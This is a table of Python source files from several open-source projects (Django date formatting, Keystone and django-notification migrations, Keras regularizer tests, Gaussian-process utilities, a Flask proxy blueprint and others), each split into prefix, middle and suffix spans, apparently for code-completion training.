| repo_name (stringlengths 5-100) | path (stringlengths 4-231) | language (stringclasses, 1 value) | license (stringclasses, 15 values) | size (int64, 6-947k) | score (float64, 0-0.34) | prefix (stringlengths 0-8.16k) | middle (stringlengths 3-512) | suffix (stringlengths 0-8.17k) |
|---|---|---|---|---|---|---|---|---|
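Each row below splits one source file into three consecutive text spans, `prefix`, `middle`, and `suffix`; the cell boundaries fall mid-token (e.g. `colv` + `ec(X_true))`), so concatenating the three fields appears to reconstruct the original file. The sketch below illustrates that reading of the schema; the field names follow the header above, but the row values are hypothetical placeholders, not taken from the table.

```python
# Minimal sketch of how a row in this schema can be reassembled.
# All literal values here are made up for illustration.
row = {
    "repo_name": "example/repo",
    "path": "pkg/module.py",
    "language": "Python",
    "license": "mit",
    "size": 32,
    "score": 0.01,
    "prefix": "def add(a, b):\n    return a ",
    "middle": "+ ",
    "suffix": "b\n",
}

# prefix + middle + suffix appears to give back the original file text,
# and `size` would then be its length in characters.
source_text = row["prefix"] + row["middle"] + row["suffix"]
assert source_text == "def add(a, b):\n    return a + b\n"
assert len(source_text) == row["size"]
```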
astroswego/plotypus | test/demo.py | Python | gpl-3.0 | 2,337 | 0.012409 |
from sys import exit
import numpy as np
np.random.seed(4) # chosen by fair dice roll. guaranteed to be random.
from sklearn.linear_model import LinearRegression, LassoCV
from sklearn.pipeline import Pipeline
from plotypus.preprocessing import Fourier
from plotypus.utils import colvec
from plotypus.resources import matplotlibrc
import matplotlib
matplotlib.use('Agg')
from matplotlib import rc_file
rc_file(matplotlibrc)
import matplotlib.pyplot as plt
color = True
def lc(X):
return 10 + np.cos(2*np.pi*X) + 0.1*np.cos(18*np.pi*X)
def main():
X_true = np.linspace(0, 1, 1001)
y_true =
|
lc(X_true)
n_samples = 50
X_sample = np.random.uniform(size=n_samples)
y_sample = lc(X_sample) + np.random.normal(0, 0.1, n_samples)
predictor = Pipeline([('Fourier', Fourier(9)),
('OLS', LinearRegression())])
predictor = predictor.fit(colvec(X_sample), y_sample)
y_pred = predictor.predict(colv
|
ec(X_true))
predictor = Pipeline([('Fourier', Fourier(9)),
('Lasso', LassoCV())])
predictor = predictor.fit(colvec(X_sample), y_sample)
y_lasso = predictor.predict(colvec(X_true))
ax = plt.gca()
signal, = plt.plot(np.hstack((X_true,1+X_true)),
np.hstack((y_true, y_true)),
linewidth=0.66, color='black')
fd, = plt.plot(np.hstack((X_true,1+X_true)),
np.hstack((y_pred, y_pred)),
linewidth=2.5, ls='dashed',
color='darkred' if color else 'black')
lasso, = plt.plot(np.hstack((X_true,1+X_true)),
np.hstack((y_lasso, y_lasso)),
linewidth=3, color='black', ls='dotted')
sc = plt.scatter(np.hstack((X_sample,1+X_sample)),
np.hstack((y_sample, y_sample)),
marker='+', s=20,
color='darkblue' if color else 'black')
plt.legend([signal, sc, fd, lasso],
["True Signal", "Noisy Data", "OLS", "Lasso"],
loc='best')
plt.xlim(0,2)
plt.xlabel('Phase')
plt.ylabel('Magnitude')
plt.title('Simulated Lightcurve Example')
plt.tight_layout(pad=0.1)
plt.savefig('demo.eps')
plt.clf()
if __name__ == '__main__':
exit(main())
|
kikinteractive/kik-python | kik/messages/attribution.py | Python | mit | 1,812 | 0.001104 |
from kik.resource import Resource
class Attribution(Resource):
"""
Parent class for all attribution types
"""
pass
class CustomAttribution(Attribution):
"""
Att
|
ribution class for custom attributions, as documented at `<https://dev.kik.com/#/docs/messaging#attribution>`_
Usage:
>>> from kik.messages import CustomAttribution, LinkMessage
>>> message = LinkMessage()
>>> message.attribution = CustomAttri
|
bution(
>>> name='A Name',
>>> icon_url='http://foo.bar/anicon'
>>> )
"""
def __init__(self, name=None, icon_url=None):
self.name = name
self.icon_url = icon_url
@classmethod
def property_mapping(cls):
return {
'name': 'name',
'icon_url': 'iconUrl'
}
class PresetAttribution(Attribution):
"""
Attribution class for the preset attribution types (e.g. "gallery" or "camera")
"""
def __init__(self, preset_name):
self.preset_name = preset_name
def to_json(self):
return self.preset_name
class PresetAttributions(object):
"""
List of preset attribution types.
Valid only on :class:`PictureMessage <kik.messages.PictureMessage>` and
:class:`VideoMessage <kik.messages.VideoMessage>`.
:cvar GALLERY: Makes the message appear to be from a user's gallery.
:vartype GALLERY: kik.message.attribution.PresetAttribution
:cvar CAMERA: Makes the message appear to be from a camera.
:vartype CAMERA: kik.message.attribution.PresetAttribution
Usage:
>>> from kik.messages import PresetAttributions, PictureMessage
>>> message = PictureMessage()
>>> message.attribution = PresetAttributions.CAMERA
"""
GALLERY = PresetAttribution('gallery')
CAMERA = PresetAttribution('camera')
|
nitely/Spirit | spirit/core/tests/models/__init__.py | Python | mit | 341 | 0 |
# -*- cod
|
ing: utf-8 -*-
from .auto_slug import (
AutoSlugPopulateFromModel, AutoSlugModel,
AutoSlugDefaultModel, AutoSlugBadPopulateFromModel
)
from .task_result import TaskResultModel
__all__ = [
'AutoSlugPopulateFromModel', 'AutoS
|
lugModel',
'AutoSlugDefaultModel', 'AutoSlugBadPopulateFromModel',
'TaskResultModel'
]
|
atul-bhouraskar/django | django/utils/dateformat.py | Python | bsd-3-clause | 10,213 | 0.001175 |
"""
PHP date() style date formatting
See http://www.php.net/date for format strings
Usage:
>>> import datetime
>>> d = datetime.datetime.now()
>>> df = DateFormat(d)
>>> print(df.format('jS F Y H:i'))
7th October 2003 11:39
>>>
"""
import calendar
import datetime
from email.utils import format_datetime as format_datetime_rfc5322
from django.utils.dates import (
MONTHS, MONTHS_3, MONTHS_ALT, MONTHS_AP, WEEKDAYS, WEEKDAYS_ABBR,
)
from django.utils.regex_helper import _lazy_re_compile
from django.utils.timezone import (
_datetime_ambiguous_or_imaginary, get_default_timezone, is_naive,
make_aware,
)
from django.utils.translation import gettext as _
re_formatchars = _lazy_re_compile(r'(?<!\\)([aAbcdDeEfFgGhHiIjlLmMnNoOPrsStTUuwWyYzZ])')
re_escaped = _lazy_re_compile(r'\\(.)')
class Formatter:
def format(self, formatstr):
pieces = []
for i, piece in enumerate(re_formatchars.split(str(formatstr))):
if i % 2:
if type(self.data) is datetime.date and hasattr(TimeFormat, piece):
raise TypeError(
"The format for date objects may not contain "
"time-related format specifiers (found '%s')." % piece
)
pieces.append(str(getattr(self, piece)()))
elif piece:
pieces.append(re_escaped.sub(r'\1', piece))
return ''.join(pieces)
class TimeFormat(Formatter):
def __init__(self, obj):
self.data = obj
self.timezone = None
# We only support timezone when formatting datetime objects,
# not date objects (timezone information not appropriate),
# or time objects (against established django policy).
if isinstance(obj, datetime.datetime):
if is_naive(obj):
self.timezone = get_default_timezone()
else:
self.timezone = obj.tzinfo
@property
def _no_timezone_or_datetime_is_ambiguous_or_imaginary(self):
return (
not self.timezone or
_datetime_ambiguous_or_imaginary(self.data, self.timezone)
)
def a(self):
"'a.m.' or 'p.m.'"
if self.data.hour > 11:
return _('p.m.')
return _('a.m.')
def A(self):
"'AM' or 'PM'"
if self.data.hour > 11:
return _('PM')
return _('AM')
def e(self):
"""
Timezone name.
If timezone information is not available, return an empty string.
"""
if not self.timezone:
return ""
try:
if hasattr(self.data, 'tzinfo') and self.data.tzinfo:
return self.data.tzname() or ''
except NotImplementedError:
pass
return ""
def f(self):
"""
Time, in 12-hour hours and minutes, with minutes left off if they're
zero.
Examples: '1', '1:30', '2:05', '2'
Proprietary extension.
"""
hour = self.data.hour % 12 or 12
minute = self.data.minute
return '%d:%02d' % (hour, minute) if minute else hour
def g(self):
"Hour, 12-hour format without leading zeros; i.e. '1' to '12'"
return self.data.hour % 12 or 12
def G(self):
"Hour, 24-hour format without leading zeros; i.e. '0' to '23'"
return self.data.hour
def h(self):
"Hour, 12-hour format; i.e. '01' to '12'"
return '%02d' % (self.data.hour % 12 or 12)
def H(self):
"Hour, 24-hour format; i.e. '00' to '23'"
return '%02d' % self.data.hour
def i(self):
"Minutes; i.e. '00' to '59'"
return '%02d' % self.data.minute
def O(self): # NOQA: E743, E741
"""
Difference to Greenwich time in hours; e.g. '+0200', '-0430'.
If timezone information is not available, return an empty string.
"""
if sel
|
f._no_timezone_or_datetime_is_ambiguous_or_imaginary:
return ""
seconds = self.Z()
sign = '-' if seconds < 0 else '+'
seconds = abs(seconds)
return "%s%02d%02d" % (sign, seconds // 3600, (seconds // 60) % 60)
def P(self):
"""
Time, in 12-hour hours, minutes and 'a.m.'/
|
'p.m.', with minutes left off
if they're zero and the strings 'midnight' and 'noon' if appropriate.
Examples: '1 a.m.', '1:30 p.m.', 'midnight', 'noon', '12:30 p.m.'
Proprietary extension.
"""
if self.data.minute == 0 and self.data.hour == 0:
return _('midnight')
if self.data.minute == 0 and self.data.hour == 12:
return _('noon')
return '%s %s' % (self.f(), self.a())
def s(self):
"Seconds; i.e. '00' to '59'"
return '%02d' % self.data.second
def T(self):
"""
Time zone of this machine; e.g. 'EST' or 'MDT'.
If timezone information is not available, return an empty string.
"""
if self._no_timezone_or_datetime_is_ambiguous_or_imaginary:
return ""
return str(self.timezone.tzname(self.data))
def u(self):
"Microseconds; i.e. '000000' to '999999'"
return '%06d' % self.data.microsecond
def Z(self):
"""
Time zone offset in seconds (i.e. '-43200' to '43200'). The offset for
timezones west of UTC is always negative, and for those east of UTC is
always positive.
If timezone information is not available, return an empty string.
"""
if self._no_timezone_or_datetime_is_ambiguous_or_imaginary:
return ""
offset = self.timezone.utcoffset(self.data)
# `offset` is a datetime.timedelta. For negative values (to the west of
# UTC) only days can be negative (days=-1) and seconds are always
# positive. e.g. UTC-1 -> timedelta(days=-1, seconds=82800, microseconds=0)
# Positive offsets have days=0
return offset.days * 86400 + offset.seconds
class DateFormat(TimeFormat):
def b(self):
"Month, textual, 3 letters, lowercase; e.g. 'jan'"
return MONTHS_3[self.data.month]
def c(self):
"""
ISO 8601 Format
Example : '2008-01-02T10:30:00.000123'
"""
return self.data.isoformat()
def d(self):
"Day of the month, 2 digits with leading zeros; i.e. '01' to '31'"
return '%02d' % self.data.day
def D(self):
"Day of the week, textual, 3 letters; e.g. 'Fri'"
return WEEKDAYS_ABBR[self.data.weekday()]
def E(self):
"Alternative month names as required by some locales. Proprietary extension."
return MONTHS_ALT[self.data.month]
def F(self):
"Month, textual, long; e.g. 'January'"
return MONTHS[self.data.month]
def I(self): # NOQA: E743, E741
"'1' if daylight saving time, '0' otherwise."
if self._no_timezone_or_datetime_is_ambiguous_or_imaginary:
return ''
return '1' if self.timezone.dst(self.data) else '0'
def j(self):
"Day of the month without leading zeros; i.e. '1' to '31'"
return self.data.day
def l(self): # NOQA: E743, E741
"Day of the week, textual, long; e.g. 'Friday'"
return WEEKDAYS[self.data.weekday()]
def L(self):
"Boolean for whether it is a leap year; i.e. True or False"
return calendar.isleap(self.data.year)
def m(self):
"Month; i.e. '01' to '12'"
return '%02d' % self.data.month
def M(self):
"Month, textual, 3 letters; e.g. 'Jan'"
return MONTHS_3[self.data.month].title()
def n(self):
"Month without leading zeros; i.e. '1' to '12'"
return self.data.month
def N(self):
"Month abbreviation in Associated Press style. Proprietary extension."
return MONTHS_AP[self.data.month]
def o(self):
"ISO 8601 year number matching the ISO week number (W)"
return self.data.isocalendar()[0]
def r(self):
"RFC 5322 formatted date; e.g. 'Thu, 21 Dec 2000 16:01:07 +0200'"
if type(self.data) is datetime.date:
rais
|
rajagopal067/testrepo | karma/python/google.py | Python | apache-2.0 | 258 | 0.031008 |
def glTypesNice(types):
"""Make types into English words"""
return typ
|
es.replace('_',' ').title()
def getLatLong(latitude, longitude):
"""returns the comb
|
ination of latitude and longitude as required for ElasticSearch"""
return latitude+", "+longitude
|
ging/keystone | keystone/contrib/oauth2/migrate_repo/versions/009_support_postgresql.py | Python | apache-2.0 | 3,936 | 0.002541 |
# Copyright (C) 2016 Universidad Politecnica de Madrid
# Copyright (C) 2014 Universidad Politecnica de Madrid
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sql
from migrate.changeset.constraint import ForeignKeyConstraint
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine; bind
# migrate_engine to your metadata
meta = sql.MetaData()
meta.bind = migrate_engine
if 'postgres' in str(meta):
# MIGRATION 007
consumer_credentials_table = sql.Table('consumer_credentials_oauth2', meta, autoload=True)
consumer_oauth2 = sql.Table('consumer_oauth2', meta, autoload=True)
ForeignKeyConstraint(
columns=[consumer_credentials_t
|
able.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='consumer_credentials_oauth2_client_id_fkey').drop()
ForeignKeyConstraint(
columns=[consumer_credentials_table.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='con
|
sumer_credentials_oauth2_client_id_fkey', ondelete='CASCADE').create()
# MIGRATION 008
access_token_table = sql.Table('access_token_oauth2', meta, autoload=True)
consumer_oauth2 = sql.Table('consumer_oauth2', meta, autoload=True)
ForeignKeyConstraint(
columns=[access_token_table.c.consumer_id],
refcolumns=[consumer_oauth2.c.id],
name='access_token_oauth2_consumer_id_fkey').drop()
ForeignKeyConstraint(
columns=[access_token_table.c.consumer_id],
refcolumns=[consumer_oauth2.c.id],
name='access_token_oauth2_consumer_id_fkey', ondelete='CASCADE').create()
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
meta = sql.MetaData()
meta.bind = migrate_engine
if 'postgres' in str(meta):
# MIGRATION 007
consumer_credentials_table = sql.Table('consumer_credentials_oauth2', meta, autoload=True)
consumer_oauth2 = sql.Table('consumer_oauth2', meta, autoload=True)
ForeignKeyConstraint(
columns=[consumer_credentials_table.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='consumer_credentials_oauth2_client_id_fkey', ondelete='CASCADE').drop()
ForeignKeyConstraint(
columns=[consumer_credentials_table.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='consumer_credentials_oauth2_client_id_fkey').create()
# MIGRATION 008
access_token_table = sql.Table('access_token_oauth2', meta, autoload=True)
consumer_oauth2 = sql.Table('consumer_oauth2', meta, autoload=True)
ForeignKeyConstraint(
columns=[access_token_table.c.consumer_id],
refcolumns=[consumer_oauth2.c.id],
name='access_token_oauth2_consumer_id_fkey', ondelete='CASCADE').drop()
ForeignKeyConstraint(
columns=[access_token_table.c.consumer_id],
refcolumns=[consumer_oauth2.c.id],
name='access_token_oauth2_consumer_id_fkey').create()
|
zqfan/leetcode | algorithms/74. Search a 2D Matrix/solution.py | Python | gpl-3.0 | 543 | 0.003683 |
class Solution(object):
d
|
ef searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
m, n = len(matrix), len(matrix[0]) if matrix else 0
l, r = 0, m * n - 1
while l <= r:
mid = (l + r) / 2
num = matrix[mid / n][mid % n]
if target < num:
r = mid - 1
elif target > num:
l = mid + 1
else:
|
return True
return False
|
NICTA/linearizedGP | linearizedGP/gputils.py | Python | gpl-3.0 | 4,822 | 0 |
# linearizedGP -- Implementation of extended and unscented Gaussian processes.
# Copyright (C) 2014 National ICT Australia (NICTA)
#
# This file is part of linearizedGP.
#
# linearizedGP is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# linearizedGP is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with linearizedGP. If not, see <http://www.gnu.org/licenses/>.
""" General utilities useful for Gaussian processes.
Author: Daniel Steinberg (daniel.steinberg@nicta.com.au)
Institute: NICTA
Date: 17 Mar 2014
"""
import numpy as np
import scipy.linalg as la
def jitchol(A):
""" Do cholesky decomposition with a bit of diagonal jitter if needs be.
Arguments:
A: a [NxN] positive definite symmetric matrix to be decomposed as
A = L.dot(L.T).
Returns:
A lower triangular matrix factor, L, also [NxN].
"""
# Try the cholesky first
try:
cholA = la.cholesky(A, lower=True)
return cholA
except la.LinAlgError as e:
pass
# Now add jitter
D = A.shape[0]
jit = 1e-13
cholA = None
di = np.diag_indices(D)
Amean = A.diagonal().mean()
while jit < 1e-3:
try:
Ajit = A.copy()
Ajit[di] += Amean * jit
cholA = la.cholesky(Ajit, lower=True)
break
except la.LinAlgError as e:
jit *= 10
if cholA is None:
raise la.LinAlgError("Too much jit! " + e.message)
return cholA
def cholsolve(L, b):
""" Solve the system of equations Ax = b with the cholesky A = L*L.T
Arguments:
L: A [NxN] lower triangular cholesky factor.
b: A [NxD] matrix or N vector.
Return:
x: a [NxD] matrix or N vector solution.
"""
return la.solve_triangular(L.T, la.solve_triangular(L, b, lower=True))
def k_fold_CV(X, Y, k=5):
""" Generator to divide a dataset k non-overlapping folds.
Author: Lachlan McCalman
Modified: Daniel Steinberg
Arguments:
X: Input data [DxN] where D is the dimensionality, and N is the
number of samples (X can also be a 1-d vector).
Y: Output data vector of length N.
k: [optional] the number of folds for testing and training.
Returns (per call):
Xr: [D x ((k-1) * N / k)] t
|
raining input data
Yr: [(k-1) * N / k] training output data
Xs: [D x (N / k)] testing input data
Ys: [N / k] testing output data
All of these are randomly split (but non-overlapping per call)
"""
X = np.atleast_2d(X)
random_indices = np.random.permutation(X.shape[1])
X = X[:, random_indices]
Y = Y[random_indices]
X_groups = np.array_split(X, k, axis=1)
Y_groups = np.array_split(Y, k)
for i in range(k):
|
X_s = X_groups[i]
Y_s = Y_groups[i]
X_r = np.hstack(X_groups[0:i] + X_groups[i + 1:])
Y_r = np.concatenate(Y_groups[0:i] + Y_groups[i + 1:])
yield (X_r, Y_r, X_s, Y_s)
def k_fold_CV_ind(nsamples, k=5):
""" Generator to return random test and training indeces for cross fold
validation.
Arguments:
nsamples: the number of samples in the dataset
k: [optional] the number of folds
Returns:
rind: training indices of length nsamples * (k-1)/k
sind: testing indices of length nsamples * 1/k
Each call to this generator returns a random but non-overlapping
split of data.
"""
pindeces = np.random.permutation(nsamples)
pgroups = np.array_split(pindeces, k)
for i in range(k):
sind = pgroups[i]
rind = np.concatenate(pgroups[0:i] + pgroups[i + 1:])
yield (rind, sind)
def logdet(L, dochol=False):
""" Compute the log determinant of a matrix.
Arguments:
L: The [NxN] cholesky factor of the matrix if dochol is False,
otherwise the original [NxN] matrix if dochol is True.
dochol: [optional] do a cholesky decomposition on the input matrix
L if it is not already as cholesky factor.
Returns:
The log determinant (scalar)
"""
if dochol is True:
L = jitchol(L)
return 2 * np.log(L.diagonal()).sum()
|
kevin-coder/tensorflow-fork | tensorflow/python/keras/regularizers_test.py | Python | apache-2.0 | 3,702 | 0.005673 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras regularizers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.framework import test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
DATA_DIM = 5
NUM_CLASSES = 2
class KerasRegularizersTest(keras_parameterized.TestCase):
def create_model(self, kernel_regularizer=None, activity_regularizer=None):
model = keras.models.Sequential()
model.add(keras.layers.Dense(NUM_CLASSES,
kernel_regularizer=kernel_regularizer,
activity_regularizer=activity_regularizer,
input_shape=(DATA_DIM,)))
return model
def get_data(self):
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=10,
test_samples=10,
input_shape=(DATA_DIM,),
num_classes=NUM_CLASSES)
y_train = keras.utils.to_categorical(y_train, NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test, NUM_CLASSES)
return (x_train, y_train), (x_test, y_test)
@parameterized.named_parameters([
('l1', keras.regularizers.l1()),
('l2', keras.regularizers.l2()),
('l1_l2', keras.regularizers.l1_l2()),
])
def test_kernel_regularization(self, regularizer):
with self.cached_session():
(x_train, y_train), _ = self.get_data()
model = self.create_model(kernel_regularizer=regularizer)
model.compile(loss='categorical_crossentropy', optimizer='sgd')
assert len(model.losses) == 1
model.fit(x_train, y_train, batch_size=10,
epochs=1, verbose=0)
@parameterized.named_parameters([
('l1', keras.regularizers.l1()),
('l2', keras.regularizers.l2())
|
,
('l2_zero', keras.regularizers.l2(0.)),
])
@test_util.deprecated_graph_mode_only
def test_activity_regularization(self, regularizer):
with self.cached_session():
(x_train, y_train), _ = self.get_data()
model = self.create_model(activity_regularizer=regularizer)
model.compile(loss='categorical_crossentropy', optimizer='sgd')
assert len(model.losses) == 1
model.fit(x_train, y_train, batch_size=10,
epochs=1, verbose=0)
@ker
|
as_parameterized.run_all_keras_modes
@keras_parameterized.run_with_all_model_types
def test_zero_regularization(self):
# Verifies that training with zero regularization works.
x, y = np.ones((10, 10)), np.ones((10, 3))
model = testing_utils.get_model_from_layers(
[keras.layers.Dense(3, kernel_regularizer=keras.regularizers.l2(0))],
input_shape=(10,))
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
model.fit(x, y, batch_size=5, epochs=1)
if __name__ == '__main__':
test.main()
|
speedyGonzales/RunTrainer | record/models.py | Python | gpl-3.0 | 244 | 0.02459 |
from django.db import
|
models
# Create your models here.
class Record(models.Model):
description=mode
|
ls.TextField()
distance=models.IntegerField()
reg_date=models.DateTimeField('date published')
reg_user=models.IntegerField()
|
arctelix/django-notification-automated | notification/migrations/0004_auto__add_noticequeuebatch.py | Python | mit | 7,050 | 0.007801 |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'NoticeQueueBatch'
db.create_table('notification_noticequeuebatch', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('pickled_data', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('notification', ['NoticeQueueBatch'])
def backwards(self, orm):
# Deleting model 'NoticeQueueBatch'
db.delete_table('notification_noticequeuebatch')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
|
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('
|
django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'notification.notice': {
'Meta': {'ordering': "['-added']", 'object_name': 'Notice'},
'added': ('django.db.models.fields.DateTimeField', [], {}),
'archived': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'data': ('picklefield.fields.PickledObjectField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notice_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['notification.NoticeType']"}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'recipient': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'unseen': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'notification.noticequeuebatch': {
'Meta': {'object_name': 'NoticeQueueBatch'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pickled_data': ('django.db.models.fields.TextField', [], {})
},
'notification.noticesetting': {
'Meta': {'unique_together': "(('user', 'notice_type', 'medium'),)", 'object_name': 'NoticeSetting'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'medium': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'notice_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['notification.NoticeType']"}),
'send': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'notification.noticetype': {
'Meta': {'object_name': 'NoticeType'},
'default': ('django.db.models.fields.IntegerField', [], {}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'display': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
'notification.observation': {
'Meta': {'ordering': "['-added']", 'object_name': 'Observation'},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notice_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['notification.NoticeType']"}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'send': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['notification']
|
codeboy/coddy-sitetools | sitetools/coddy_api/api_resource.py | Python | bsd-3-clause | 1,729 | 0.001157 |
# -*- coding: utf-8 -*-
class ResourceOptions(object):
"""
A configuration class for ``Resource``.
Provides sane defaults and the logic needed to augment these settings with
the internal ``class Meta`` used on ``Resource`` subclasses.
"""
allowed_methods = ['get', 'post', 'put', 'delete', 'patch']
list_allowed_methods = None
detail_allowed_methods = None
# limit = getattr(settings, 'API_LIMIT_PER_PAGE', 20)
urlconf_namespace = None
default_format = 'application/json'
filtering = {}
ordering = []
object_class = None
queryset = None
fields = []
excludes = []
include_resource_uri = True
include_absolute_url = False
always_return_data = False
api_name = None
resource_name = None
resp_message = 'Good!'
resp_script = None
resp_success = True
resp_template = 'adminpanel/ap-test.html'
resp_type = 'tpl'
resp_render_data = None
make_function = None
def __new__(cls, meta=None):
overrides = {}
# Handle overrides.
if meta:
for override_name in dir(meta):
# No internals please.
if not override_name.startswith('_'):
|
overrides[override_name] = getattr(meta, override_name)
allowed_methods = overrides.get('allowed_methods', ['get', 'post', 'put', 'delete', 'patch'])
if overrides.get('list_allowed_methods', None) is None:
overrides['list_allowed_methods'] = allowed_methods
if overrides.get('detail_allowed_methods', None) is None:
overrides['detail_allowed_methods'] = allowed_methods
return object.__new__(type('ResourceOptions', (cls,), overrides))
|
|
labsland/labmanager | labmanager/views/proxy.py | Python | bsd-2-clause | 7,224 | 0.007198 |
import re
import time
import urlparse
import requests
from flask import Blueprint, Response, abort, stream_with_context, request, url_for, jsonify, current_app
from labmanager.db import db
from labmanager.models import AllowedHost
proxy_blueprint = Blueprint('proxy', __name__)
WHITELIST_REQUEST_HEADERS = ["Accept-Language", "Cache-Control", "Cookie", "If-Modified-Since", "User-Agent", "If-None-Match", "If-Unmodified-Since"]
WHITELIST_RESPONSE_HEADERS = ["ETag", "Content-Type", "Server", "Last-Modified", "Date", "Location"]
unfinished_regexps = [
re.compile(""".* href='[^']*$"""),
re.compile(""".* href="[^"]*$"""),
re.compile(""".* src="[^"]*$"""),
re.compile(""".* src='[^']*$"""),
]
def extract_base_url(url):
parsed = urlparse.urlparse(url)
new_path = parsed.path
# Go to the last directory
if '/' in new_path:
new_path = new_path[:new_path.rfind('/')+1]
